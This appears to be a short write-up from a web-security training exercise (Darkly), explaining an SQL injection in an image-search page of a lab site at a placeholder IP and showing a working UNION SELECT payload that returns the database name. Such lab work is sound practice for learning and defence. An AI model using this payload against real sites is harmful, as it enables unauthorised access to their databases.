XD-OB/Darkly/06_SQL-Injection-Images/Ressources/explaination.md

 We found an SQL Injection in: `http://{IP}/?page=searchimg`

-SQL injection: is a code injection technique that might destroy your database.

 - Get the database name: `1 AND 0=1 UNION SELECT 1, database()`
 ===> `Member_images`